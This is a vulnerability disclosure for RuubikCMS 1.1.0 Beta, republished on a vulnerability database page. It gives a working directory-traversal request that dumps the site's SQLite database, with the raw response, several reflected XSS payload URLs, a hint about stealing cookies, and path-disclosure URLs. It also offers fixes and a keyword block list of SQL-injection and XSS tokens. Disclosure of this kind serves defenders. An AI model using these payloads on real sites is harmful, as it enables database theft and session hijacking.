Vulners
Lucene search
RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal
=========================================================
Vulnerable software: RuubikCMS Version 1.1.0 Beta
Official site: http://www.ruubikcms.com/
Downloaded from: http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip
=========================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.24
=========================================================
VUln Desc:
RuubikCMS Version 1.1.0 Beta is prone to Traversal,XSS,
Info And Path Disclosures.
=========================================================
1) Traversal vuln:
//ruubikcms/extra/image.php
Vulnerable code section:
(To exploit this vuln you need to be authenticated against application)
*This vuln can be exploited by users to escalate privileges to admin on windows OS*
==============SNIP==================
<?php
// --- Image displayer with authentication
// --- Sample call: image.php?f=imgfile.jpg
// --- Sample call with subfolder: image.php?f=subfolder/imgfile.jpg
require('../ruubikcms/includes/dbconfig.php');
$dbh = new PDO(PDO_DB_DRIVER.':../'.RUUBIKCMS_FOLDER.'/'.PDO_DB_FOLDER.'/'.PDO_DB_NAME); // database connection object
require('../ruubikcms/includes/commonfunc.php');
define('LOGOUT_TIME', query_single("SELECT logout_time FROM options WHERE id = 1"));
require('login/session.php');
// check if logged in
if ([email protected]$_SESSION['uid']) die("Access denied.");
// images directory
define('BASE_DIR','useruploads/images/');
// make sure program execution doesn't time out
@set_time_limit(0);
if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
if (strstr($_GET['f'], '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
if (!is_file($fpath)) die("File does not exist.");
// file size in bytes
// $fsize = filesize($fpath);
// get mime type
$mtype = '';
if (function_exists('mime_content_type')) {
$mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
$finfo = finfo_open(FILEINFO_MIME); // return mime type
$mtype = finfo_file($finfo, $fpath);
finfo_close($finfo);
}
if ($mtype == '') {
$mtype = "image/jpeg";
}
header("Content-type: $mtype");
readfile($fpath);
?>
=====================================
We can traverse it on windows OS.
Exploit:
GET /learn/ruubikcms/extra/image.php?f=..\..\..\ruubikcms\sqlite\ruubikcms.sqlite HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: cmslogin=1vbnblnfsb367lgoovsr1qdo2b9c2hav
=============================*RAW responce body:*=============================
HTTP/1.1 200 OK
Date: Tue, 22 May 2012 12:01:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: image/jpeg
34800
SQLite format 3??[email protected]
??<???????(???????????????????????????????????????????????????????????????
?????????????????????????????????a%tablepagepage
CREATE TABLE "page" ("pageurl" text PRIMARY KEY ,"name" text,"title" text,"header1" text,"description" text,
"keywords" text,"content" text,"mother" text,"levelnum" integer,"ordernum" integer,"image1" text,"image2" text,
"lang" text,"pagetype" integer,"extracode" text,"status" integer, "updater" TEXT, "updated" TEXT, "creator" TEXT)'
;?indexsqlite_autoindex_page_1page?Ytablesitesite
CREATE TABLE "site" ("id" integer PRIMARY KEY ,"name" text,"doctype" integer,"charset" text,"robots" text,
"title" text,"description" text,"keywords" text,"copyright" text,"author" text,"lang" text,"gacode" text,
"news_textlink" INTEGER,"news_readmore" INTEGER,"news_showdate" INTEGER,"news_maxshort" INTEGER, "no_image1"
INTEGER, "no_image2" INTEGER, "clean_url" INTEGER, "url_suffix" TEXT, "news_num" INTEGER, "siteroot" TEXT,
"news_read??????
???
???x?x????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????)!%)
G?)!%)
G
?RuubikCMS Demoiso-8859-1index,followRuubikCMS DemoRuubikCMSIisakki Piril, Henrik Valrosfi?n
Read more??????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????"
C
??
====================================EOF SNIP=====================================
Use Fiddler to intercept RAW body of responce.
How to fix?:
Open //ruubikcms/extra/image.php
Change the lines no 22 and 23 to this:
//============BEGIN===========
if (strstr(str_ireplace('\\','',$_GET['f']), '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
//============END=============
2) Due several XSS vulns in 3'rd party application called TinyBrowser 1.41
(TinyBrowser 1.41 - A TinyMCE file browser (C) 2008 Bryn Jones
(author website - http://www.lunarvis.com))
ruubikcms is also vulnerable to XSS.
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=image&folder=&feid="/>a<script>alert(1);</script>
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&feid="</a><script>alert(1);</script>
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image"</a><script>alert(1);</script>&folder=&feid=owned
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?feid="</a><script>alert("AkaStep");</script>
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&find="><script>alert("AkaStep");</script>
HINT: charcode it if you want to steal cookies.
For @admins,@users,@webmasters:
To prevent XSS vulns in this case see below:(remember this is not ideal solution it is only *workaround*)
Save all this stuff as antikiddie.php and upload it to:
/ruubikcms/tiny_mce/plugins/tinybrowser/
Then open config_tinybrowser.php and include your antikiddie.php
in config_tinybrowser.php
===================BEGIN==============
<?php
error_reporting('off');
/*
//antikiddie.php
include it in your /ruubikcms/tiny_mce/plugins/tinybrowser/config_tinybrowser.php
(at bottom after <?php
)
like this:
include 'antikiddie.php';
ANOTHER NOTE:
we can add more tastes here but that may broke
application's api.So I removed a lot of tastes from here.
*/
$commonpatterns=array("$","/*","*","union",'"','\'',
"0x",
"where","concat","concat_ws","group_concat",
"information_schema","tables","columns","where","concat","concat_ws","group_concat",
"information_schema","tables","columns",'*',
"hex","table_name","column_name","distinct",
"/*!","*/","into","load_file",'(',')',
"outfile","truncate","drop",
"delete",";","+","substr","update",
"hex","table_name","column_name",'\x00','\n','\r','\\','\\x1a',
"schemata","mysql","convert","using","char","$","`","|",
"\\","(","from",")",'mysql',
"table","dumpfile","php",
"distinct",'<','>','<script>','base64','alert','\\','</script>','%0d%0a',
'document.write',',','String.fromCharCode','..','document.cookie','cookie','eval','href','document.location','location.replace','window',
'onmouse','onblur','onfocus','onerror','\'','limit','javascript');
foreach($commonpatterns as $myvals)
{
if(stristr(urldecode($_SERVER['QUERY_STRING']),$myvals))
{
die('<script>alert("No Scriptkidding! :)");</script>'. PHP_EOL .
'<h1>Can\'t Proceed your request! It is malicious.</h1>');
}
}
unset($myvals);
?>
==================END=================
3)Info disclosure to get more info about system:
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log
4)Path disclosure:
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php
Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
NEWS
Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31
Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31
http://192.168.0.15/learn/ruubikcms/extra/login/session.php
Notice: Use of undefined constant LOGOUT_TIME - assumed 'LOGOUT_TIME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\extra\login\session.php on line 17
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php
Notice: Use of undefined constant PDO_DB_DRIVER - assumed 'PDO_DB_DRIVER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3
Notice: Use of undefined constant PDO_DB_FOLDER - assumed 'PDO_DB_FOLDER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3
Notice: Use of undefined constant PDO_DB_NAME - assumed 'PDO_DB_NAME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3
could not find driver
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php
Notice: Use of undefined constant EXTRAPAGES - assumed 'EXTRAPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 4
EXTRAPAGES
Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17
Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/footer.php
Notice: Use of undefined constant VERSION - assumed 'VERSION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
Notice: Use of undefined constant VERNUM - assumed 'VERNUM' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
VERSION VERNUM
Notice: Use of undefined constant THANKYOUTEXT - assumed 'THANKYOUTEXT' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
Notice: Use of undefined constant DOCUMENTATION - assumed 'DOCUMENTATION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
Notice: Use of undefined constant FEEDBACK - assumed 'FEEDBACK' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
THANKYOUTEXT RuubikCMS | DOCUMENTATION | FEEDBACK
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/head.php
See title of page.
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php
A lot of notices.
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/multilang.php
Notice: Undefined variable: multilang_links in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2
Warning: Invalid argument supplied for foreach() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php
Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
NEWS
Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31
Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php
Notice: Use of undefined constant WEBPAGES - assumed 'WEBPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 4
WEBPAGES
Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17
Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/required.php
Warning: require(../includes/dbconfig.php) [function.require]: failed to open stream: No such file or directory in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4
Fatal error: require() [function.require]: Failed opening required '../includes/dbconfig.php' (include_path='.;C:\php5\pear') in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php
Notice: Use of undefined constant SNIPPETS - assumed 'SNIPPETS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 4
SNIPPETS
TinyMCE
Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17
Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php
Notice: Use of undefined constant USERS - assumed 'USERS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 4
USERS
Notice: Use of undefined constant ADMINISTRATORS - assumed 'ADMINISTRATORS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 15
ADMINISTRATORS
Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21
Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/login/form.php
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php
function tinyBrowserPopUp(type,formelementid,folder)
{ tburl = "/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php" + "?type=" +
type + "&feid=" + formelementid; if (folder !== undefined) tburl += "&folder="+folder+"%2F";
newwindow=window.open(tburl,'tinybrowser','height=495,width=785,scrollbars=yes,resizable=yes'); if
(window.focus) {newwindow.focus()} return false; }
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php
Contains full path to application in plaintext.
http://192.168.0.15/learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php
Direct Plaintext output.
Workaround about info disclosures:
Open ruubikcms\tiny_mce\plugins\tinybrowser\fns_tinybrowser.php
Change the line no 423 to this:
=========BEGIN========
//error_log($err, 3, 'error.log');
=========END==========
or you can try:
=========BEGIN========
error_log($err, 3, 'error_log');
=========END==========
Do not forget remove your old error.log
Workaround about path disclosures:
Open your main .htaccess files (if it doesn't exist on public_html/.htaccess)
create new one and copy/paste this:
==========BEGIN======
php_value error_reporting off
==========END========
This will disable all error reporting if any error,warnings,notices occurs.
Vendor Notified about vulns.
++++As always My Special Thanks to:++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com &&
to all AA Team
++++++++++++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^
# 0day.today [2018-03-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 May 2012 00:00Current
7.1High risk
Vulners AI Score7.1